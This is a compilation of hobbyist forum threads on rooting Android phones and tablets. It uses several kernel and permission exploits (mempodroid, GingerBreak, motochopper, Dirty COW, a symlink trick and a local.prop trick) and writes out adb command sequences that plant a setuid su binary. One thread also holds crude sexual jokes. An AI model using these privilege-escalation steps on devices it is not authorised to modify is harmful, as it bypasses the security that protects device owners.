[HOWTO] Get offsets for ICS exploit - Android Software/Hacking General [Developers Only]

Saurik's mempodroid exploit needs offsets of "exit" and "setresuid" functions calls in order to work.
Here's a tool that may find this two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risks.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.

Hi,
don't work on HTC One X with 4.0.3.
cheers
starbase64

Already too old
Hi,
Mempodipper / mempodroid exploit uses a serious security hole in Linux kernels 2.6.39 and higher, making some noise in Linux' world. A patch has been given by Linus Torvalds himself late january.
It always take some times to deploy patched kernels but by now, most of them are probably mempodroid-resistants.
Wait for the next...

I just updated my samsung galaxy nexus from 4.0.2 to 4.0.4. Before that, I could root it using the command line provided by saurik:
Galaxy Nexus 4.0.2: 0xd7f4 0xad4b
Click to expand...
Click to collapse
source: https://github.com/saurik/mempodroid
After the update, I did not manage to root it so I came to this topic after some research on xda
Unfortunately, it looks the 4.0.4 update patches this hole on the galaxy nexus (or the n95-offsets tool does not work, which is probably not the case). Here for the record is what is returned by the tool:
[email protected]:/data/local/tmp $ ./n95-offsets
n95-offsets by Nesquick95
Gets requiered offsets for mempodroid exploit
./mempodroid 0xd7cc 0xad27 sh
1|[email protected]:/data/local/tmp $ ./mempodroid 0xd7cc 0xad27 sh
1|[email protected]:/data/local/tmp $
Click to expand...
Click to collapse
No root shell given. Any proof on the vulnerability beeing patched with 4.0.3 or 4.0.4?

No proof but...
Hi,
I've also lost mempodroid rooting capacity when upgrading my Galaxy Nexus from 4.0.2 to 4.0.4.
The tool can be wrong but I mainly think that the hole has been patched. But you're right, no proof of it until now

Nesquick95 said:
Hi,
I've also lost mempodroid rooting capacity when upgrading my Galaxy Nexus from 4.0.2 to 4.0.4.
The tool can be wrong but I mainly think that the hole has been patched. But you're right, no proof of it until now
Click to expand...
Click to collapse
Yes, I think that too. How did you managed to get the 4.0.4 rooted then? Did you unlock the bootloader or did you use another root exploit?

Unlocked
I've rooted 4.0.4 by unlocking the bootloader, flashing ClockworkMod recovery then an update.zip containing only the su binary.
I'd prefered keeping stock booloader locked but there is not so much kernels exploits around here for now and I ain't got time for testing other devices (Acer, Sony,...) specifics exploits on the Gnex...
If you're interested, you can take a look at Dan Rosenberg's works, in addition to all the great things already done here at XDA :
http://vulnfactory.org/blog/

Nesquick95 said:
Saurik's mempodroid exploit needs offsets of "exit" and "setresuid" functions calls in order to work.
Here's a tool that may find this two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risks.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.
Click to expand...
Click to collapse
Hi Nesquick. I need to compile this source and mempodroid for a MIPS tablet (4.0.3 ICS and 3.0.8 kernel), since it seems that it cannot be rooted. Can't adb root or su. Do you think that it could be used or you can help generating the binaries for MIPS?
Thanks in advance

Hi,
Hard to say if it will work or not... Your 3.0.8 kernel may be a good candidate as long as it hasn't be mempodroid-patched by the tablet's provider.
I have Google NDK r7 installed, it offers only x86 and ARM support. It seems that MIPS support comes with r8 :
http://developer.android.com/sdk/ndk/index.html
You'll find the perl script used to compile my C programs attached (thanks to the author, Andrew Ross). I think t won't be to hard to adapt it to NDK r8 / MIPS platform...

the offsets of "exit" is wrong
Nesquick95 said:
Saurik's mempodroid exploit needs offsets of "exit" and "setresuid" functions calls in order to work.
Here's a tool that may find this two offsets while running on your ICS device and give you the mempodroid command line to run for gaining a temporary root shell.
This tool doesn't add any capability to Saurik's exploit.
Please let me know if you have any idea for improvement.
Feel free to use this tool, at your own risks.
1- download and unzip
2- push the two binaries to /data/local/tmp with adb
3- chmod 755
4- run n95-offsets
5- copy / paste the command line given by the tool
If the trick works, you will see the $ prompt change to a # one.
Hope it will help.
Click to expand...
Click to collapse
this is ok, great!!!

n95-offsets can work
olive360 said:
Hi, I get the offsets with n95-offsets
the offsets of "exit" is wrong
offsets of "setresuid" is right
my cell offsets is 0xd524 0xab8f
the offsets obtained with n95-offsets is 0x8003 0xab8f
Click to expand...
Click to collapse
sorry, i make a mistake, n95-offsets can work, i have rooted use it.

Thanks!!! It works with my Yifang / Mediacom MD 860 S2 (Generic ICS 4.0.4 tablet on a Cortex A9 platform)

Hi, I've Mediacom 715i (new one with 4.0.4), I've used n95-offsets to find the two offset, then I've executed mempodroid, but it doesn't work. still have '$' prompt. Any Idea?

Related

The easiest 1.47.651.1 root+nand unlock you'll ever see without a gui (Updated)

Make sure your battery has a decent amount of charge in it, you don't want to run out of juice in the middle of this.
You will need to have the android sdk installed, as you will need to use the adb tool.
Windows users will need to install HTC Sync in order to get the usb driver for the phone installed.
Part 1: In which we find that the Evo spreads easier than a Thai whore during tourist season
Code:
adb shell "rm /data/local/rights/mid.txt"
adb shell "ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt"
adb reboot
Part 2: In which we find that engineers have no personality, but they make one hell of a bootloader
Put the files from Toast's Part 2, for nand unlock onto the sdcard (PC36IMG.zip, mtd-eng.img, recovery.img, flash_image)
then (after making sure the sdcard is remounted to the phone if you used disk mode to xfer the files):
Code:
adb shell "cat /sdcard/flash_image > /data/local/rights/flash_image"
adb shell "chmod 755 /data/local/rights/flash_image"
adb shell "/data/local/rights/flash_image misc /sdcard/mtd-eng.img"
adb reboot bootloader
When asked if you want to update, say yes. Relax for a while, the update takes some time.
When the phone eventually boots back up:
Part 3: In which I find the whore, and make her install a custom recovery
Code:
adb shell "cat /sdcard/flash_image > /data/flash_image"
adb shell "chmod 755 /data/flash_image"
adb shell "/data/flash_image recovery /sdcard/recovery.img"
After this you should be fully rooted with nand unlock.
I highly recommend going through Whitslack's Starting Over method to bring your software and radios up to date.
You're done.
Pity this only came to light a few days before people are going to be upgrading to a new OTA.
No, this will not work for anyone who updated to 2.2.
epic!!! 789
niice!
Nice Find!
At least now people can be rooted prior to the new OTA!
damn it!
___
Sweet! Wish I had that method starting out. Lol.
Sent from my PC36100 using XDA App
does this method really work??
BAttitude7689 said:
does this method really work??
Click to expand...
Click to collapse
Yes it does.
ok, so i have no idea how that works... care to go into it alittle bit more?
khshapiro said:
ok, so i have no idea how that works... care to go into it alittle bit more?
Click to expand...
Click to collapse
The init scripts chmod 777 mid.txt on boot (this means that anyone can do anything to the file basically). By removing the file and linking it to mtd1, the chmod now makes mtd1 accessible by everyone after a reboot, which means that you can go directly to toast's part2 which starts with flashing mtd-eng.img.
Incidentally it appears the droid eris guys have been using this flaw to their advantage for a while as well ;D.
So no, really? What is "root?"
You do fine work, sir
posting in a legendary thread
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
netarchy said:
Part 1:
Code:
adb shell rm /data/local/rights/mid.txt
adb shell ln -s /dev/mtd/mtd1 /data/local/rights/mid.txt
adb reboot
Click to expand...
Click to collapse
What would be more interesting is for someone on the new OTA non-root to see if this exists in the Froyo release. I'll look around for a posting of the OTA update non-rooted and try it on my smashed phone. At least I won't care if that thing looses root.
Could we get a "The easiest 1.47.651.1 root method with nand unlock" for dummies? I have no clue what to do with this code.
You need to use an ADB shell for this using the Android SDK....
I tried to use the Evo-Recovery shell and received permission denied errors.
I am not a DEV by any means, and do not claim any credit for any of this. However, for people who need help, this may offer some assistance -- this is definitely the easiest root method out there.
1. Download and Install Android SDK - Learn Here
http://forum.xda-developers.com/showthread.php?t=694250
2. Open up a Command Prompt by holding windows button & pressing R or by pressing Run and typing CMD.
3. Navigate your way in DOS to the Android SDK folder, then to the Tools Folder
4. Then enter in the code in part 1. After each line press enter...the line will repeat below it.
5. Follow Toasts Part 2 -- Link: http://forum.xda-developers.com/showthread.php?t=701835 -- Video found here: http://www.youtube.com/watch?v=tUXTB0eydwE.
5A. Because you didn't do Toast's Part 1 of Root first (you used an exploit provided by the OP), you will NOT have a NAND Backup. Put the Custom ROM you want to load on your SD card, and after unlocking NAND protection and doing the wipes, load it from the custom recovery in lieu of restoring your NAND backup.
6. You're now rooted w/ NAND Unlocked!
7. I would then suggest going here, and running this so you have a fully rooted, stock ROM with all your radio/wimax up to date: http://forum.xda-developers.com/showthread.php?t=715915.
Anyone know if this method will work on an unrevoked3'd Evo? I am trying to acquire full root and I was going to use SimpleRoot today but if this will work...
Thank you for this! Question about number part 7. YOu suggest running the fully rooted stock 1.47.651.1 afterwards. Would it be a bad idea to Just run the fully rooted stock froyo 3.23.651.3 or even any other custom rom for that matter? i.e OMJ's EVO 2.2 Custom rom? Thanks
regulator207 said:
Couldn't you then just use wits "start over" method for part two to make the process even shorter?
Click to expand...
Click to collapse
No because you need the engineering hboot to flash it since it's not signed by HTC.
Should work on 1.32 or 1.47. Nice.
Someone should test if this still works in the new 2.2 update. Good chance it does.
damit!
justinisyoung said:
damn it!
___
Click to expand...
Click to collapse
Hey! That's what I was gonna say!

How to DOWNGRADE Desire S with S-ON

Warning! I don't recommend this to users who are new to Android since there is a possibility of bricking your device. I will not be responsible if this happens.
It will downgrade everything even the HBoot using a HTC signed ROM. I've downgraded RUU_Saga_Telstra_WWE_1.36.841.3 with HBoot 0.98.0002 to Hboot 0.98.0000 of RUU_Saga_HTC_Thailand_1.35.1113.2.
First you need below tools and applications. I will not explain everything since I'm assuming you already know how to use it and make it.
1. ADB tool to access you device thru shell.
2. ADB driver - you may install HTC Sync since it has ADB driver in it.
3. HEX Editor - I used HxD.
4. Spare micro SD with Goldcard.
5. Card reader to make your life easier.
6. Update.zip ROM you will use to downgrade(rename it to PG88IMG.zip).
6. GingerBreak-v1.20.apk to temp root our device.
Step 1: Copy GingerBreak-v1.20.apk to your spare micro SD and insert it into your phone.
Step 2: Enable USB debugging in your device and connect it to your PC(Charge only). Make sure the drivers are installed properly. If not, install HTC Sync.
Step 3: Install and run GingerBreak-v1.20.apk. It will force close other apps(this is normal just close it). The gingerbreak application will promp that something goes wrong with the rooting(can't remember the actual spiel) but actually we already have our temp root.
Step 4: Run you ADB tool and issue command su to have root access. You can now see in your device that Superuser app is prompting you to allow the ADB root access. Accept it.
Step 5: On the # prompt, issue command dd if=/dev/block/mmcblk0p17 of=/mnt/sdcard/mmcblk0p17.img (to copy mmcblk0p17 to your SDcard). Power off your device and copy mmcblk0p17.img to your PC.(You can also use the command shell to copy it into your PC if you know how to do it).
Step 6: Open mmcblk0p17.img using your Hex editor. On the 11th line(I think), modify the current version to 1.28.401.1(since this is the lowest version I know). Save it and copy back to SDcard. Insert the sdcard and turn your phone on.
Step 7: Run GingerBreak-v1.20.apk again and follow step 3 to 4.
Step 8: On the # prompt, issue command dd if=/mnt/sdcard/mmcblk0p17.img of=/dev/block/mmcblk0p17 (to copy back mmcblk0p17.img to your phone). Do this as quickly as possible since the temp root access sometimes loose its effect.
Step 9: Power off your device and remove your SDcard. Using your card reader, delete everything(not format) in your microSD(with Goldcard) and paste your PG88IMG.zip.
Step 10: Hold volume down + power to boot to recovery and the phone will do the installation itself. Wait until you have your downgraded ROM.
This is how I do it. Hope you won't encounter any problem with this procedure. Good luck!
I want to give thanks to all the XDA members for the knowledge I acquired for this procedure and to the developer of Gingerbreak.
You may also check sonikz procedure on post #4. I think his procedure is faster. You may use which one is easier for you to follow.
Downgrade to what?To Froyo?
And for what reason?
Sorry for that noob question...
panosfx said:
Downgrade to what?To Froyo?
And for what reason?
Sorry for that noob question...
Click to expand...
Click to collapse
Good question i think, if i remember well, on the desire (or HD?) sometimes downgrading was a way of getting to a version of software where you then could get root again !From that point on you could get a recovery installed and install some nice roms. I dont know if thats whats going on here, i wouldn't dare to hope that ...?
Me n00b me downgrade
Newrad67, I have compiled a n00b way to achieve very similar results:
First off you need to create a Gold Card
Use the memory card that came with the phone, may as well hey!
Install Goldcard helper from market, run it and copy the CID for MMC2
This number has already been reversed so go to here, fill out the required fields.
That will then email you an image file. You can then using Gold Card Tool flash your image file to your phones SD card via the phones USB cable.
Next for the actual downgrade
You'll need this unzipped
in a command prompt, goto the directory you unzipped to
connect the phone via USB
then:
adb push misc_version /data/local/tmp
adb push GingerBreak /data/local/tmp
adb shell chmod 777 /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/GingerBreak
Click to expand...
Click to collapse
This copies the files to the phone and changes the permissions so they will function
adb shell
Click to expand...
Click to collapse
This will enter the terminal for the phone
./data/local/tmp/GingerBreak
Click to expand...
Click to collapse
This will then temp root the phone you should now have # at the terminal prompt instead of $, which means you have higher privileges
From this point you can then run misc_version (Thanks to Blezz for the version number) This changes the version reported by the phone to 1.27.405.6, you cannot check this on the phone tho, as it will still report the other number.
cd /data/local/tmp
./misc_version -s 1.27.405.6
Click to expand...
Click to collapse
From here you can then install the update/downgrade from the exe, no need to dump zip files or anything. As with anything here, results may vary and I won't be buying new hardware if it breaks yours! But it works a treat on mine.
This can be used with paulobriens test signed RUU HTC update to get root/boot/recovery installed on s-on .
If it just were public
Sent from my HTC Desire S using XDA Premium App
panosfx said:
Downgrade to what?To Froyo?
And for what reason?
Sorry for that noob question...
Click to expand...
Click to collapse
This is why I recommend this only to advance users.
Our Desire S with S-On was released with Gingerbread ROM and Hboot that still not possible(as of now) to have custom boot recovery. Since we are on S-On, it is still not possible to be rooted and use custom ROM.
As far as I know, we don't have any official ROM except for Gingerbread. Correct me if I'm wrong. The list can be seen in this post. http://forum.xda-developers.com/showthread.php?t=1002506
I'm just sharing this to people who wants to change their ROM if they want to change to a different one. Like me who installed the latest ROM from TELSTRA and find the bloatware annoying. I've done this to get back to the ROM I'm more comfortable using.
Yeah I'm pretty much with you mate, no way to do anything more practical than flash a clean European Rom currently..... Not really a vast amount of progress either. Anything we should be doing to help get permanent root? Anyone?
Sent from my HTC Desire S using XDA App
Thankkssssss
It works on my s-on DS
Thanks a lot
i really like it how sonikz is doing now like it was his idea how to downgrade it using adb gingerbreak and misc_version lol
i'm gonna stop my rooting tries + supporting here for the desire s, hating such people like him
I never said it was my idea and I have in a posted my thanks to the relevant people in other threads, I didn't mean to rub anyone the wrong way... I hadn't seen a adb version of gingerbreak until Friday and I'm sure you know the apk is very unpredictable or at least it is on my phone so I couldn't use misc_version, it just kept kicking errors.... Hey I just threw it out there, my bad
okay
no it isnt the apks fault, maybe u forgot to use "su" in adb shell after using the apk, which u dont need for the command line version
anyway, maybe there is a way to get past the s-offf
in titanium backup there's a recovery exploit to remove files from s-on phones
we just need to know how the exploit is working and if it still working with 2.3
2nd option is i am getting a 2nd desire s soon.. it's a bugged on, radio destroyed and he don't get it repalced so he gives it me
maybe i can get the desire hd bootloader running somehow.. even if i am sure it will be a lot of work to get in
Plz guys... Get a grip.. we share.. whocares about credit.. come on..
Keep sharing.
Sent from my HTC Desire S using XDA Premium App
Worked
Sent from my HTC Desire S using XDA Premium App
@Rexton270: what worked?
@brokenworm: what you meant by the paulobriens test RUU?
@brokenworm:
it's not paul's ruu, the files he published been released 1 day before at 911snipers blog
sadly without ruu too
what ROM to get root
after doing that, what ROM is it better to download in order to become root ?
thanks
pdaGeek13 said:
after doing that, what ROM is it better to download in order to become root ?
thanks
Click to expand...
Click to collapse
If you are on S-ON, none as of now.
Sent from my HTC Desire S using XDA Premium App
> 2 hours
running for more than 2 hours now, normal ?
sonikz said:
Newrad67, I have compiled a n00b way to achieve very similar results:
First off you need to create a Gold Card
Use the memory card that came with the phone, may as well hey!
Install Goldcard helper from market, run it and copy the CID for MMC2
This number has already been reversed so go to here, fill out the required fields.
That will then email you an image file. You can then using Gold Card Tool flash your image file to your phones SD card via the phones USB cable.
Next for the actual downgrade
You'll need this unzipped
in a command prompt, goto the directory you unzipped to
connect the phone via USB
then:
This copies the files to the phone and changes the permissions so they will function
This will enter the terminal for the phone
This will then temp root the phone you should now have # at the terminal prompt instead of $, which means you have higher privileges
From this point you can then run misc_version (Thanks to Blezz for the version number) This changes the version reported by the phone to 1.27.405.6, you cannot check this on the phone tho, as it will still report the other number.
From here you can then install the update/downgrade from the exe, no need to dump zip files or anything. As with anything here, results may vary and I won't be buying new hardware if it breaks yours! But it works a treat on mine.
Click to expand...
Click to collapse
no not normal, restart your phone and try again
cause it's s-on nothing can happen to your system so don't worry and just restart
Blezz said:
no not normal, restart your phone and try again
cause it's s-on nothing can happen to your system so don't worry and just restart
Click to expand...
Click to collapse
same thing with this log:
$ ./GingerBreak
./GingerBreak
[**] Gingerbreak/Honeybomb -- android 2.[2,3], 3.0 s
[**] (C) 2010-2011 The Android Exploid Crew. All rig
[**] Kudos to jenzi, the #brownpants-party, the Open
[**] Zynamics for ARM skills and Onkel Budi
[**] donate to [email protected] if you like
[**] Exploit may take a while!
[+] Plain Gingerbread mode!
[+] Found system: 0xafd17fd5 strcmp: 0xafd38065
[+] Found PT_DYNAMIC of size 232 (29 entries)
[+] Found GOT: 0x00014360
[+] Using device /devices/platform/goldfish_mmc.0
[*] vold: 25104 GOT start: 0x00014360 GOT end: 0x000
[*] vold: 25104 idx: -1024 fault addr: 0xfffb2284
[*] vold: 25162 idx: -2048 fault addr: 0xfff4e284
[*] vold: 25212 idx: -3072 fault addr: 0xffeea284
[*] vold: 25262 idx: -4096 fault addr: 0xffe86284
[*] vold: 25312 idx: -5120 fault addr: 0xffe22284
[*] vold: 25363 idx: -6144 fault addr: 0xffdbe284
[*] vold: 25414 idx: -7168 fault addr: 0xffd5a284
[*] vold: 25466 idx: -8192 fault addr: 0xffcf6284
etc ....
and sometimes:
[+] fault address in range (0x000132b4,idx=-3072)
[+] Calculated idx: -2005
[-] sendmsg() failed?
[-] sendmsg() failed?
[-] sendmsg() failed?
:-(

[Q] How to root AigoPad M60

Someone can help me how to root aigopad m60?.. im already searching all over the net...
Thanks.
kickhopperX said:
Someone can help me how to root aigopad m60?.. im already searching all over the net...
Thanks.
Click to expand...
Click to collapse
There are two apps aimed at rooting Android devices: 'z4root' and 'superoneclick' but success with these is hit or miss. It's worth a shot
Sent from my SCH-R880 using xda app-developers app
kickhopperX said:
Someone can help me how to root aigopad m60?.. im already searching all over the net...
Thanks.
Click to expand...
Click to collapse
Hello kickhopperX
I also have a tablet aigopad m60 like you. this tablet is already rooter, you need just one application as ES Explorer which will allow you access to the tree (/).
I needed time to mount my sd card external sd card to the system.
One question: your tablet restarts all the time?
Good Day
Escuse me if I speak a little sore I use google translate to translate.
aigoPad m60
fariik said:
Hello kickhopperX
I also have a tablet aigopad m60 like you. this tablet is already rooter, you need just one application as ES Explorer which will allow you access to the tree (/).
I needed time to mount my sd card external sd card to the system.
One question: your tablet restarts all the time?
Good Day
Escuse me if I speak a little sore I use google translate to translate.
Click to expand...
Click to collapse
do you mean that it's already rooted ?
have you tried Directory Bind or SwapSD ?
i already tried z4root & super one click to root this device..both option won't work..please help us
I already found the solution guys!
Search 4Shared this apps :
DamNxQQr/doomlord_v1_xperia-2011-ics-ro
hoho.. thanks dude.. its working!!..
well... got custom rom for this tablet?..
its working ? how u do it ?
kickhopperX said:
hoho.. thanks dude.. its working!!..
well... got custom rom for this tablet?..
Click to expand...
Click to collapse
Not working with my aigopad m60 need help here cause Im dont know where to start
already have DamNxQQr/doomlord_v1_xperia-2011-ics-ro download to my PC and i have not install anything yet on aigopad m60
follow the instruction on runme(windows batch file) and when i run the batch it say " adb server is out of date " and " more the 1 device and emulator " then its say "complete
YAY!!!!! nothing happen
arerain86 said:
I already found the solution guys!
Search 4Shared this apps :
DamNxQQr/doomlord_v1_xperia-2011-ics-ro
Click to expand...
Click to collapse
I'm trying on my AigoPad M60, but not working
Here's how i did it.
Download and install moborobo.Launch the app and let it download the driver for m60.
once stabilize, unplug your tablet and reboot. on your dektop exit moborobo and kill the process. Reconnect tablet and execute runme.bat.
Let me know.
Thanks
[ROOT] [HOWTO] aigoPad M60 rooting script + generic su + generic usb driver
Hi.
I owned several aigoPad M60 bought from all over (to say it have slightly different ICS 4.0.3 revisions) and some I actually got them revisions by sending to service centre and flashed to a newer firmware.
Nevertheless, all of them can be rooted using this script (for Windows, 380 KB).
I actually rooted a Kindle Fire HD first using this script found on some chinese site (sorry I already forgot where I did so please pardon me for lack of credits). I cleaned up and englicised the whole thing, and updated the ADB tools to greater (and more compatible) version. Actually most ICS root scripts found everywhere are more or less the same.
So far, devices tested and succeded:
- Amazon Kindle Fire HD (ICS version)
- aigoPad M60 (ICS)
- Samsung Galaxy SII (GT-I9100 & GT-I9100G) ICS and Jellybean (works on mine, both phones and both 4.0.3 and 4.1.2)
- Chinese Samsung Galaxy SIII clone (can't explain much since it's a bootleg, it has MTK board) (ICS)
- Several other chinese tablets which somehow lose it's root or not rooted (ICS): Momo.cn 3G, AMPE, MaPaN. Sorry didn't remember it's exact models anymore.
This script contains a batch file, ADB exe file and two API libraries, and a generic su found in chinese tablets. The su works up to certain level but it is preferred to replace that with SuperSU from chainfire (Superuser from chainsdd didn't work well on these ICS chinese tablets, for me. Not sure about koushik's). Just install and when it asks to replace binary, choose normal and tap yes.
You have to have installed USB driver first. I have uploaded the compatible USB ADB driver for most chinese phones and tablets (8.5 MB, have to be split into x32 and x64 since the forum doesn't allow 8MB+ attachments, if you're not sure, download both and merge the folders, overwriting duplicate files).
Note: The driver works on Windows XP, 7 and 8. On Win 7 and 8 you will have to disable driver signature verify in order to install. (Win 7: Boot, F8, Disable signature. Win 8: Setting, Change PC Settings, General, Advanced Startup, look for Disable signature)
Those who already have ADB and drivers installed, here it is (simplified form of the actual script):
Windows (no need admin for ADB, just for driver installation):
Code:
adb wait-for-device
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
adb wait-for-device
adb shell rm /data/local.prop
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
adb wait-for-device
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
adb kill-server
Linux:
Same
Tip: If you want to, you don't have to download anything. Just copy+paste the script. But make sure you have su in current directory. You can get chainfire's su from SuperSU.apk (assets\supersu.arm.png, rename it to su).
Careful though, this copy+paste script lacks safety measures compared to the one in the archive, such as it doesn't check if the rooting is a success or not, but the script inside archive will prompt you first before wiping /data/local/tmp ...
Note: What I mean by the su works 'up to certain level' is, it doesn't accept command lines such as su -c command. Also you will have to replace it with a proper superuser app (SuperSU, Superuser) if you want to use Titanium Backup, Lucky Patcher and so on...
i juz purchase one for my kids to play games and i google on how to root the aigopad m60, it took me here.
Many thanks for the guide, i succesfully root it.

Temporary root via motochopper

Hi, I was experimenting on rooting without registering to HTCDev, testing many Linux kernel exploits. (I don't write the exploits myself, I compile exploits source codes and try to make it run on One SV kernel)
The exploit I found working is motochopper, with some minor modifications, it could also be used to gain temporary root on One SV.
I tested this exploit on Taiwanese version of One SV, which is k2u and Android 4.1.2, kernel version is "3.4.10-gb590306 [email protected] #1 SMP PREEMPT"
First download motochopper.zip from the link above, unzip it.
Code:
adb push pwn /data/local/tmp/
adb shell chmod 755 /data/local/tmp/pwn
adb push su /data/local/tmp/
adb push busybox /data/local/tmp/
Now, adb shell into it and execute /data/local/tmp/pwn , this would push the su executable to /system/xbin , then "su -" , you should now become root!
But due to HTC modified kernel, which has eMMC write protection, /system partition is unwritable. Some time later you would find the su executable you pushed to /system/xbin disappear, this would also happen on reboots. This means you would need to re-run this exploit every time you reboot!
The motochopper exploit is based on CVE-2013-2596, which affects Linux kernel before 3.8.9 and some Android builds. Since the vulnerability came from Linux kernel, I predict it would also work on all versions of One SV's kernel 3.4.10, perhaps even all HTC 3.4.10 kernels.
With temporary root, you could read & write memory (dump kernel image), dump any partition (but some of them is readonly as above mentioned), etc.
I'm still thinking how to get permanent root from this point, post here if you have any ideas!
ps. I have less then 10 posts so I can't post to development boards. But this post should go there I guess.
Did someone try on the LTE version ?
Doest it work?
I would like to use that to remove few Stock apps; like Best Deals, Flicker for HTC Sence, FB for HTC Sence etc...
But once it's over, before reboot, is it possible to delete the files ?
If you're on hboot 2.0 (if you updated to jb) you won't be able to remove anything, since the system partition is write protected. Apps'll come back after reboot.
On hboot 1 no problem though , afaik.

Dirty Cow

Just wondering if the new Dirty Cow exploit means all those previously unrootable phones can now (or very soon) be rooted.
http://www.cyberciti.biz/faq/dirtyc...local-privilege-escalation-vulnerability-fix/
kennonk said:
Just wondering if the new Dirty Cow exploit means all those previously unrootable phones can now (or very soon) be rooted.
http://www.cyberciti.biz/faq/dirtyc...local-privilege-escalation-vulnerability-fix/
Click to expand...
Click to collapse
Based upon the early research into this, YES it would appear that this also has widespread affect into the Android Linux Kernel
https://www.nowsecure.com/blog/2016/10/21/dirty-cow-vulnerability-mobile-impact/
https://www.theguardian.com/technol...ow-linux-vulnerability-found-after-nine-years
(Bottom of Article Google confirms Android is susceptible)
PoC Code which would probably need to be slightly refactored for use in Android, but still highly relevant
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
The bug affects the Android Linux kernel. I already tested it, and yes, you can change any file owned by root to whatever you want.
But that doesn't mean you can actually root the phone (that is, gain root access). Maybe it is possible, but I don't think is trivial. The thing is: you can modify root owned files, yes. But you need that some process owned by root executes your file, so you can gain root access. Editing init scripts won't work since they are recreated every time you boot your phone, and after the phone boots, as far as I know, nothing else is executed by root.
I don't mean that it can't be done, maybe there's some file that is executed by root after boot out there that you can modify, but I wouldn't know which one.
Scorpius666 said:
The thing is: you can modify root owned files, yes. But you need that some process owned by root executes your file, so you can gain root access.
Click to expand...
Click to collapse
Doesn't that mean you can install a custom su binary and just execute that as any user?
This exploit only allows you to replace the content of existing files with their existing mode/permissions, and the way su operates you need the setuid (set-user-ID) bit set in the mode, and from a brief look at the system I wanted to get root on, android doesn't seem to have any setuid binaries.
I'm thinking replacing something like wpa_supplicant could let us execute the payload as root, just disable and re-enable wifi, but I can't seem to get the exploit itself to work at the moment.
On further inspection (at least on this device), wpa_supplicant isn't readable by non-root (which I think the exploit requires). app_process is, but that's an executable I'd prefer not to mess with
Update:
Got the exploit itself working.
Tried replacing /system/bin/fsck_msdos's content to trigger it to be run as root by inserting a microSD card,
but something on this device (Amazon Fire 5th gen) keeps rebooting and restoring the system partition if any file is changed.
a___ said:
This exploit only allows you to replace the content of existing files
Click to expand...
Click to collapse
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in/system etc..
The counterside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
The /system partition is mounted read only by default. Because of this, you can't overwrite them. But I saw a exploit which used /sys/kernel/uevent_helper to execute a shell script as root. This would probably also work with the dirty cow exploit.
KillahKiwi said:
Doesn't that mean you can install a custom su binary and just execute that as any user?
Click to expand...
Click to collapse
You can't create a new file. You can modify an existing file. The su binary needs the setuid bit and there are no files in the Android filesystem with that bit set.
The only way to root a phone with this bug is to modify an executable that will change the owner of the su binary to root and set the setuid bit on this file. This part is trivial and very easy.
The difficult part is to find a binary that will be executed as root after you have booted. If somebody knows any file in /system/bin for example that will be executed as root doing some action on the phone tell me and the phone will be rooted in seconds.
---------- Post added at 11:32 AM ---------- Previous post was at 11:28 AM ----------
a___ said:
Got the exploit itself working.
Tried replacing /system/bin/fsck_msdos's content to trigger it to be run as root by inserting a microSD card,
but something on this device (Amazon Fire 5th gen) keeps rebooting and restoring the system partition if any file is changed.
Click to expand...
Click to collapse
I copied the su binary in /data/local/tmp. I can modify files in /system/bin for example and the phone does not reboot, but i don't have fsck_msdos in my phone.
---------- Post added at 11:35 AM ---------- Previous post was at 11:32 AM ----------
DP FH said:
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in/system etc..
The counterside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
Click to expand...
Click to collapse
I'm compiling on the phone using UXTerm, then apt install clang, and then using gcc. It's the quickest way to compile a single .c file on it.
Scorpius666 said:
. It's the quickest way to compile a single .c file on it.
Click to expand...
Click to collapse
I'd like to create a standard Android app that uses jni to run exploit and then roots the device. I can't test on my real phone because I need warranty and Knox counter to 0.
DP FH said:
Not true. This code executes su as root, spawning a root shell. It can be modified to run a script that installs su in/system etc..
The counterside is that the kernel crashes/freezes after some seconds.
https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2
I'd like to port that to an apk using the ndk, but my pc is too old.
Click to expand...
Click to collapse
At first try doesn't work for me:
Code:
[email protected]:/data/local/tmp $ ./dirtyc0w-mem b6dc0000 b6dc1000
[*] range: b6dc0000-b6dc1000]
[*] getuid = b6f79b18
[*] mmap 0xb6dd5000
[*] exploiting (patch)
./dirtyc0w-mem: failed to execute "su": Permission denied
[*] exploiting (unpatch)
[*] unpatched: uid=2000 (madviseThread)
[*] unpatched: uid=2000 (procselfmemThread)
But I'll modify a little bit to see if I can get it to work.
Scorpius666 said:
doesn't work for me.
Click to expand...
Click to collapse
I don't think you have su on the phone ????
By the way I'm trying to install some emulator on my pc so I can try
DP FH said:
I don't think you have su on the phone ????
By the way I'm trying to install some emulator on my pc so I can try
Click to expand...
Click to collapse
I do have the su, in /data/local/tmp, with users permission. The idea is to do a chown root:root and a chmod 4755.
But I know what the problem is. The SHELLCODE in the file is for x86, which seems to be a XOR AX, AX and a RET. I have to do the same for an ARM v7L in THUMB I think...
DP FH said:
